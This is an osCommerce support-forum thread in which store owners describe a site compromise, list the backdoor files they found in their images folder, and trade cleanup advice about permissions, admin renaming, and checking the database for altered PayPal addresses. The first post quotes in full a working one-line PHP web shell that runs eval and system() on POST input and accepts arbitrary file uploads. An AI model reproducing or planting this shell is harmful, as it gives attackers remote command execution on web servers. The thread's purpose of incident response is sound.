Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

I'm on the evil list


dh2997

Recommended Posts

Posted

Hi just still trying to find all the files from the EVIL hack 3 days of drama.......

 

I found strange files in my image folder one was a list of sites. My site was on the list form some kinda hack

the bad files I have found so far are:

 

.cch/

.news/

news.dot

news.php

news.txt

page.php

sitemap.php

sites.txt

style.css

sys.php

key.txt

load.swf

mhp.php

m1.php

phpinfo.php

 

the google bot stuff looks like

google3a778e90416873.php

the code looks like:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

 

The php code in all the bad files all mentioned evil somewhere in it... even the encrypted code you see the trademark evil on it.

Basically ANY PHP file in you images is unusual it should be .jpg and maybe some .gif

 

So I made some changes:

 

I changes the name of the admin folder for the OsC locked it with a .htaccess password

I deleted the file manager in the control panel for OsC

Changed all of my passwords for OsC

I changed the permissions on my image folder 755 ( it will have to be changed back to 777 only while you are adding new product or need to add to the image file)

I am still going through the files and deleting bad ones.

there were some nasty php files asking the sql for email passwords etc

a php that loaded a search box to upload any files to my image folder (I hope that is the only place where they were going)

There was a sites.txt file with a long list of sites mine was on the list. (So now I'm on some world wide hacker list of easy victims)

Changed the main password on my cpanel

I cant do a back up in the OsC because I changed the admin name (still working on that path problem)

I have more to delete with OsC they have way to much info available on the control panel.

the phpinfo.php was a copy of the server_info.php from the admin just sitting in my image file public for all eyes!!!

I have some product Items showing up in the specials that I did not add a log list of A-Z Meds it must be in the SQL DB files so some how they did get into that.

The hack starts with a few google bot files with EVIL in the code (I also found them in the image file on one of my other sites I'm making the same changes to all of my sites.)

then it loads bad php files into the image file and gets into the control panel for OsC (where there is all the info the need)

I have been in the OcS forums and the goal of the hack seems to be to get customer info passwords etc and divert the paypal fund to a diff account. Some sites said they even had fake orders

I have changed all the passwords on paypal

I got new API passwords and signature.

 

I keep checking my site logs to see who is online and the same IP's keep looking for these bad files 66.249.71.143 and 98.230.158.29 I looked them up they say they belong to google and comcast also some from amazon and microsoft???? they are specifically looking for the bad file names?

 

 

OK so thanks for your time I hope this was helpful to anyone cleaning up this mess.....

 

I would still like to remove the define_language.php in the admin if any one has advice on that?

and how to make my back up work?

If there is any thing more advice anyone has foe me or others with the same problem please let me know.

Thanks!

Posted

Hack documented here (as best I could).

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

My Images folder was attacked and 'goog1e' files added after setting permission to 777. I had to as anytime I set it to 755 My client couldn't upload images. The goog1e files seem to be the only files added to the images folder that have added and none of the above you speak of. I renamed the admin folder and allowed certain IP addresses via htaccess.

 

How can I enable the 755 setting without breaking the image upload function for my client. There are a few more folders that require folder settings 777 in order for the site to work fully.

 

How can I check if the database hasn't been injected? Can I run a scan?

 

Very Concerned

Posted

For folders with "less than ideal" permissions you might consider this

 

It doesn't stop people from uploading their crap, but they can't run it after it is uploaded, thus rendering it useless.

 

I know of no "DB scanner" for osC.

 

If it were me I'd make a SQL backup of the DB and examine it with a text editor.

 

Not an ideal approach I realize.

 

Maybe someone else will pipe-up with a better idea.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

For folders with "less than ideal" permissions you might consider this

 

It doesn't stop people from uploading their crap, but they can't run it after it is uploaded, thus rendering it useless.

 

I know of no "DB scanner" for osC.

 

If it were me I'd make a SQL backup of the DB and examine it with a text editor.

 

Not an ideal approach I realize.

 

Maybe someone else will pipe-up with a better idea.

 

Hi

 

What should I be looking for when examining the DB text?

Posted

There is a hack going around that changes the email address in the DB associated with Paypal transactions.

 

I helped someone once that had the store name replaced with a malicious script in the DB.

 

Sometimes they may add a new administrator to the DB.

 

Those are the only concrete examples I can think of.

 

Just keep an eye out for things that don't look right.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

There is a hack going around that changes the email address in the DB associated with Paypal transactions.

 

I helped someone once that had the store name replaced with a malicious script in the DB.

 

Sometimes they may add a new administrator to the DB.

 

Those are the only concrete examples I can think of.

 

Just keep an eye out for things that don't look right.

 

I'm worried sick about this.

 

What lines/text should I be looking out for in the DB to find link to fake Paypal site?

Posted

Download the SQL backup file to your PC.

 

Open the SQL file with Wordpad and search for all the lines that have "Paypal" in them. Then check all the email addy's on said lines.

 

Sincerely not meaning to be rude, crude, or obnoxious, but....

 

If you can't spot a hack when it stares you in the face you're wasting your time.

 

Find someone that can spot a hack and have them look it over.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

Download the SQL backup file to your PC.

 

Open the SQL file with Wordpad and search for all the lines that have "Paypal" in them. Then check all the email addy's on said lines.

 

Sincerely not meaning to be rude, crude, or obnoxious, but....

 

If you can't spot a hack when it stares you in the face you're wasting your time.

 

Find someone that can spot a hack and have them look it over.

 

When you say email addy do you mean the email address I have registered to my paypal account? This is my first time dealing with a hack on OScommerce. So I'm learning. Thanks for your assistance.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...